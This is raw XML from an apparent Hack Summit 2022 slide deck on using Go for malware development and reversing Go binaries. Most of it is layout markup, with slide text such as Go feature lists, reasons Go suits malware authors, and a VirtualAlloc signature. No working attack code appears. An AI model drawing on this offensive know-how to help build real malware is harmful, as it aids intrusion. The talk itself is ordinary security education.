            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="17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Syscall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l-PL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addr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l-PL" sz="17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l-PL" sz="17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l-PL" sz="17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l-PL" sz="17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" name="Google Shape;313;g163d2b3b0f7_0_52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491175" y="2609400"/>
            <a:ext cx="46353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LPVOID VirtualAlloc(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[in, optional] LPVOID lpAddress,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[in]           SIZE_T dwSize,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[in]           DWORD  flAllocationType,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[in]           DWORD  flProtect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5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="26943" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777821" y="556310"/>
            <a:ext cx="2893866" cy="984102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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874713" y="3111191"/>
            <a:ext cx="5726809" cy="2694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l-PL" sz="3600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Thank you for watching!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l-P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Remember to leave your </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="pl-PL" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00F750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r>
              <a:rPr b="1" i="0" lang="pl-P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l-P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pl-PL" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>rate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="pl-PL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l-P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presentation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l-PL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the section below.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Google Shape;32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40495" y="6122186"/>
            <a:ext cx="1720512" cy="28224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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084877" y="6126310"/>
            <a:ext cx="2024400" cy="314100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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thehacksummit.com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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698382" y="6127378"/>
            <a:ext cx="1601330" cy="313892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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13-14/10/2022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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5746830" y="6045567"/>
            <a:ext cx="1703176" cy="480091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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PGE Narodowy </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="pl-P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l-P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66739" y="6107994"/>
            <a:ext cx="205892" cy="2864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5" name="Google Shape;325;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3426944" y="6097252"/>
            <a:ext cx="282935" cy="283020"/>
            <a:chOff x="4583292" y="-1770695"/>
            <a:chExt cx="1509791" cy="1510248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="326" name="Google Shape;326;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4860639" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241983" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241983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rgbClr val="00FE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2040D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5218634" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241942" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241942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rgbClr val="00FE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2040D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5576632" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241980" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241980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rgbClr val="00FE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2040D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4860639" y="-801442"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241983" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241983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rgbClr val="00FE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2040D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5218632" y="-801439"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241942" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241942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rgbClr val="00FE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2040D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5576632" y="-801442"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241980" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241980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rgbClr val="00FE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2040D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5611942" y="-1770695"/>
              <a:ext cx="171365" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="171365">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171413" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171413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rgbClr val="00FE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2040D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4895905" y="-1770695"/>
              <a:ext cx="171365" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="171365">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171448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rgbClr val="00FE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2040D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583292" y="-1637281"/>
              <a:ext cx="1509791" cy="1376834"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1376834" w="1509791">
                  <a:moveTo>
                    <a:pt x="1512669" y="195732"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1512669" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265557" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265557" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963055" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963055" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549573" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549573" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1379278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512672" y="1379278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512672" y="195732"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1341221" y="1207824"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171451" y="1207824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171451" y="347887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341221" y="347887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341221" y="1207824"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00FE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2040D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35" name="Google Shape;335;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804378" y="6092504"/>
            <a:ext cx="291465" cy="291465"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="457200" w="457200">
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102348" y="0"/>
                  <a:pt x="0" y="102348"/>
                  <a:pt x="0" y="228600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="354852"/>
                  <a:pt x="102348" y="457200"/>
                  <a:pt x="228600" y="457200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354852" y="457200"/>
                  <a:pt x="457200" y="354852"/>
                  <a:pt x="457200" y="228600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="102348"/>
                  <a:pt x="354852" y="0"/>
                  <a:pt x="228600" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="398526" y="314325"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="335185" y="314325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339417" y="292323"/>
                  <a:pt x="341995" y="270037"/>
                  <a:pt x="342900" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="418148" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="415766" y="270893"/>
                  <a:pt x="409114" y="293497"/>
                  <a:pt x="398526" y="314325"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="172212" y="352425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="284988" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="252984" y="440722"/>
                  <a:pt x="204311" y="440817"/>
                  <a:pt x="172212" y="352425"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="161354" y="314325"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="156645" y="292380"/>
                  <a:pt x="153810" y="270075"/>
                  <a:pt x="152876" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="304800" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="303867" y="270075"/>
                  <a:pt x="301031" y="292380"/>
                  <a:pt x="296323" y="314325"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58674" y="142875"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="122015" y="142875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117783" y="164877"/>
                  <a:pt x="115205" y="187163"/>
                  <a:pt x="114300" y="209550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="39053" y="209550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="41434" y="186307"/>
                  <a:pt x="48086" y="163703"/>
                  <a:pt x="58674" y="142875"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="284988" y="104775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="172212" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="204216" y="16478"/>
                  <a:pt x="252889" y="16383"/>
                  <a:pt x="284988" y="104775"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="295847" y="142875"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="300715" y="164806"/>
                  <a:pt x="303710" y="187111"/>
                  <a:pt x="304800" y="209550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="152876" y="209550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="153810" y="187125"/>
                  <a:pt x="156645" y="164820"/>
                  <a:pt x="161354" y="142875"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39053" y="247650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="114300" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="115079" y="270027"/>
                  <a:pt x="117531" y="292314"/>
                  <a:pt x="121634" y="314325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58674" y="314325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="48086" y="293497"/>
                  <a:pt x="41434" y="270893"/>
                  <a:pt x="39053" y="247650"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="342900" y="209550"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="342121" y="187173"/>
                  <a:pt x="339669" y="164886"/>
                  <a:pt x="335566" y="142875"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="398907" y="142875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="409495" y="163703"/>
                  <a:pt x="416147" y="186307"/>
                  <a:pt x="418529" y="209550"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="373475" y="104775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325850" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="320494" y="86941"/>
                  <a:pt x="313112" y="69779"/>
                  <a:pt x="303848" y="53626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330517" y="65192"/>
                  <a:pt x="354199" y="82685"/>
                  <a:pt x="373094" y="104775"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="153448" y="53626"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="144184" y="69779"/>
                  <a:pt x="136801" y="86941"/>
                  <a:pt x="131445" y="104775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83820" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="102824" y="82638"/>
                  <a:pt x="126641" y="65142"/>
                  <a:pt x="153448" y="53626"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84106" y="352425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131731" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137087" y="370260"/>
                  <a:pt x="144469" y="387421"/>
                  <a:pt x="153734" y="403574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126926" y="392059"/>
                  <a:pt x="103110" y="374562"/>
                  <a:pt x="84106" y="352425"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="303752" y="403574"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="313016" y="387421"/>
                  <a:pt x="320399" y="370260"/>
                  <a:pt x="325755" y="352425"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="373380" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="354376" y="374562"/>
                  <a:pt x="330558" y="392059"/>
                  <a:pt x="303752" y="403574"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FE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2040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6" name="Google Shape;336;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368119" y="6198054"/>
            <a:ext cx="13401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E50"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="pl-PL" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FE50"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ORGANIZERS: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24703" y="313643"/>
            <a:ext cx="4889476" cy="4586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54039" y="5868475"/>
            <a:ext cx="765496" cy="765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14a8f0ce735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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g14a8f0ce735_0_14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4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g14a8f0ce735_0_14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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4a8f0ce735_0_14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647850" y="1245600"/>
            <a:ext cx="4337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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>GOLANG TL;DR</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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" name="Google Shape;120;g14a8f0ce735_0_14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647850" y="1832100"/>
            <a:ext cx="108963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ono"/>
              <a:buChar char="●"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made in 2007 by Google, open sourced in 2009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ono"/>
              <a:buChar char="●"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statically typed, compiled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ono"/>
              <a:buChar char="●"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designed for procedural, but allows object-oriented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ono"/>
              <a:buChar char="●"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“high productivity” - doesn’t require thousands of lines to do the job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ono"/>
              <a:buChar char="●"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concise, easy to read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ono"/>
              <a:buChar char="●"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type derivation via declare-and-initialize construct ":=" (as seen is Pascal)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ono"/>
              <a:buChar char="●"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effortless concurrent computing (goroutines)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ono"/>
              <a:buChar char="●"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single goroutine consumes approx. 2kb of stack space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ono"/>
              <a:buChar char="●"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rich C-like mem management + safety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14a8f0ce735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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g14a8f0ce735_0_29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874713" y="6139278"/>
            <a:ext cx="104427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4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g14a8f0ce735_0_29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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pl-PL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4a8f0ce735_0_29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647850" y="2226750"/>
            <a:ext cx="84633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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>GOLANG FOR MALDEV</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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9" name="Google Shape;129;g14a8f0ce735_0_29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647850" y="2813250"/>
            <a:ext cx="10896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ono"/>
              <a:buChar char="●"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cross-platform compilation, allows having a single codebase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ono"/>
              <a:buChar char="●"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efficient and reliable TCP stack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Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL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reversing nightmare (.gopclntab structure, all symbols added to the binary)</a:t>
            </a:r>
            <a:endParaRPr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3cfafd9d1_0_44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893150" y="3115050"/>
            <a:ext cx="8405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section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>REVERSING_GOLANG_BINARIES</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="00F7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1684b9ba283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13" y="1804075"/>
            <a:ext cx="36766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684b9ba283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588" y="3851950"/>
            <a:ext cx="22002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684b9ba283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1450" y="152400"/>
            <a:ext cx="7889996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1684b9ba283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300" y="485775"/>
            <a:ext cx="3619500" cy="58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684b9ba283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525" y="124825"/>
            <a:ext cx="4324901" cy="660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1684b9ba28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175" y="2724150"/>
            <a:ext cx="63436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1684b9ba283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4650" y="673663"/>
            <a:ext cx="33147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684b9ba283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550" y="245038"/>
            <a:ext cx="6972300" cy="444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684b9ba283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4400" y="2376425"/>
            <a:ext cx="4195199" cy="210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684b9ba283_0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3313" y="4693225"/>
            <a:ext cx="6726297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P">
  <a:themeElements>
    <a:clrScheme name="Niestandardowy 3">
      <a:dk1>
        <a:srgbClr val="02040D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0000AD"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00FE50"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F90F0A"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2020F3"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F4511C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="029676"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4AB5C4"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0989B1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000AD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Sylwia</dc:creator>
</cp:coreProperties>
</file>